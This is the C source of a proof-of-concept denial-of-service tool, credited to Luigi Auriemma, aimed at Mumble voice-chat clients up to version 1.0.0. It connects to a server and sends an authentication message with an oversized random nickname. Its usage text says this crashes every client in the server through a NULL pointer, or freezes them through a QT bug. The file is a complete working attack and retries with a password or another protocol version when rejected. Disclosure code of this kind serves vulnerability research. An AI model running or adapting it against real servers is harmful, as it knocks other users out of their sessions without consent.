/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
#endif



#define VER         "0.1"
#define PORT        64738
#define BUFFSZ      0x1ffff // the correct size is 0xffffff but I don't
#define CRASHCLIENT 65526   // want to occupy 16 megabytes for a basic PoC
#define BLOCKCLIENT 65525

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;
typedef uint64_t    u64;



void fgetz(u8 *data, int len);
int mumble_send(int sd, u8 *data, int size);
int mumble_recv(int sd, u8 *data);
int tcp_recv(int sd, uint8_t *data, int size);
int rnds(u8 *data, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int getmb(u8 *data, u64 *num);
int putmb(u8 *data, u64 num);
int putss(u8 *data, u8 *str);
int putmm(u8 *data, u8 *mem, int size);
u32 resolv(char *host);
void std_err(void);



enum MessageType { ServerReject, ServerAuthenticate, Speex, ServerSync, ServerJoin, ServerLeave, ServerBanList, PlayerMute, PlayerDeaf, PlayerKick, PlayerRename, PlayerBan, PlayerMove, PlayerSelfMuteDeaf, ChannelAdd, ChannelRemove, ChannelMove, ChannelLink, ChannelRename, PermissionDenied, EditACL, QueryUsers, Ping, TextMessage, PlayerTexture, CryptSetup, CryptSync, PingStats };



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u64     num;
    int     sd,
            len,
            nicklen,
            iVersion;
    u16     port    = PORT;
    u8      password[64],
            *buff,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Mumble <= 1.0.0 clients crash/freeze "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <effect> <host> [port(%hu)]\n"
            "\n"
            "Effects:\n"
            " 1 = NULL pointer crash of all the clients inside the server\n"
            "     found and fixed by the author indipendently in revision 700\n"
            " 2 = freeze all the clients inside the server\n"
            "     this is a bug in the QT library not in Mumble\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(atoi(argv[1]) == 1) {
        nicklen = CRASHCLIENT;
    } else {
        nicklen = BLOCKCLIENT;
    }

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    buff = malloc(BUFFSZ);
    if(!buff) std_err();
    iVersion    = 2;
    password[0] = 0;

redo:
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    printf("- connect...");
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    printf("ok\n");

    p = buff;
    p += putmb(p, ServerAuthenticate);  // iMessageType
    p += putmb(p, 0);                   // uiSession
    p += putmb(p, iVersion);            // iVersion
    p += putmb(p, 0);                   // iMaxBandwidth
    p += putmb(p, nicklen);             // nickname
      p += rnds(p, nicklen);
    p += putss(p, password);            // password

    mumble_send(sd, buff, p - buff);

    for(;;) {
        len = mumble_recv(sd, buff);
        if(len < 0) break;

        p = buff;
        p += getmb(p, &num);
        if(num == 3) break;
        if(num == 2) {
            close(sd);
            buff[len] = 0;

            p += getmb(p, &num);
            p += getmb(p, &num);
            printf("\n"
                "Error: the server has rejected your connection:\n"
                "\n"
                "  %.*s\n"
                "\n",
                (u32)num, p);
            if(stristr(p, "password")) {
                printf("- server is protected with password, insert the needed keyword:\n  ");
                fgetz(password, sizeof(password));
                goto redo;
            } else if(stristr(p, "wrong version")) {
                iVersion++;
                printf("- try with version %d\n", iVersion);
                goto redo;
            }
            exit(1);
        }
    }

    printf("- data sent\n");
    close(sd);
    free(buff);
    return(0);
}



void fgetz(u8 *data, int len) {
    u8      *p;

    fgets(data, len, stdin);
    for(p = data; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
}



int mumble_send(int sd, u8 *data, int size) {
    u8      tmp[3];

    putxx(tmp, size, 24);
    if(send(sd, tmp,  3,    0) < 0) return(-1);
    if(!size) return(0);
    return(send(sd, data, size, 0));
}



int mumble_recv(int sd, u8 *data) {
    u32     size;
    u8      tmp[3];

    if(tcp_recv(sd, tmp,  3) < 0) return(-1);
    getxx(tmp, &size, 24);
    if(!size) return(0);
    if(tcp_recv(sd, data, size) < 0) return(-1);
    return(size);
}



int tcp_recv(int sd, uint8_t *data, int size) {
    int     t;

    while(size) {
        t = recv(sd, data, size, 0);
        if(t <= 0) return(-1);
        data += t;
        size -= t;
    }
    return(0);
}



int rnds(u8 *data, int len) {
    u32     rnd;
    u8      *p;
    static const uint8_t table[] =
                    "0123456789abcdef"
                    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                    "abcdefghijklmnopqrstuvwxyz";

    rnd = time(NULL);

    for(p = data; len--; p++) {
        rnd = (rnd * 0x343FD) + 0x269EC3;
        *p = table[(rnd >> 16) % (sizeof(table) - 1)];
    }
    return(p - data);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;

    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << ((bytes - 1 - i) << 3));
    }

    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;

    for(i = 0; i < bytes; i++) {
        data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
    }

    return(bytes);
}



int getmb(u8 *data, u64 *num) {
    u64     i,
            v;
    u8      *p;

    i = 0;
    p = data;
    v = *p++;
    if((v & 0x80) == 0x00) {
        i = (v & 0x7F);
    } else if((v & 0xC0) == 0x80) {
        i = (v & 0x3F) << 8 | (*p++);
    } else if((v & 0xF0) == 0xF0) {
        switch (v & 0xFC) {
            case 0xF0:  i = (*p++) << 24 | (*p++) << 16 | (*p++) << 8 | (*p++); break;
            case 0xF4:  i = (u64)(*p++) << 56 | (u64)(*p++) << 48 | (u64)(*p++) << 40 | (u64)(*p++) << 32 | (*p++) << 24 | (*p++) << 16 | (*p++) << 8 | (*p++); break;
            case 0xF8:  i = ~v; break;
            case 0xFC:  i = v & 0x03; i = ~i;   break;
            default:    i = 0; break;
        }
    } else if((v & 0xF0) == 0xE0) {
        i = (v & 0x0F) << 24 | (*p++) << 16 | (*p++) << 8 | (*p++);
    } else if((v & 0xE0) == 0xC0) {
        i = (v & 0x1F) << 16 | (*p++) << 8 | (*p++);
    }

    *num = i;
    return(p - data);
}



int putmb(u8 *data, u64 num) {
    u8      *p;

    p = data;
    if(num < 0x80) {
        *p++ = (num);
    } else if(num < 0x4000) {
        *p++ = ((num >> 8) | 0x80);
        *p++ = (num & 0xFF);
    } else if(num < 0x200000) {
        *p++ = ((num >> 16) | 0xC0);
        *p++ = ((num >> 8) & 0xFF);
        *p++ = (num & 0xFF);
    } else if(num < 0x10000000) {
        *p++ = ((num >> 24) | 0xE0);
        *p++ = ((num >> 16) & 0xFF);
        *p++ = ((num >> 8) & 0xFF);
        *p++ = (num & 0xFF);
    } else if(num < 0x100000000LL) {
        *p++ = (0xF0);
        *p++ = ((num >> 24) & 0xFF);
        *p++ = ((num >> 16) & 0xFF);
        *p++ = ((num >> 8) & 0xFF);
        *p++ = (num & 0xFF);
    } else {
        *p++ = (0xF4);
        *p++ = ((num >> 56) & 0xFF);
        *p++ = ((num >> 48) & 0xFF);
        *p++ = ((num >> 40) & 0xFF);
        *p++ = ((num >> 32) & 0xFF);
        *p++ = ((num >> 24) & 0xFF);
        *p++ = ((num >> 16) & 0xFF);
        *p++ = ((num >> 8) & 0xFF);
        *p++ = (num & 0xFF);
    }
    return(p - data);
}



int putss(u8 *data, u8 *str) {
    u64     len;
    u8      *p;

    len = strlen(str);
    p = data;

    p += putmb(p, -len);
    p += putmm(p, str, len);
    return(p - data);
}



int putmm(u8 *data, u8 *mem, int size) {
    memcpy(data, mem, size);
    return(size);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


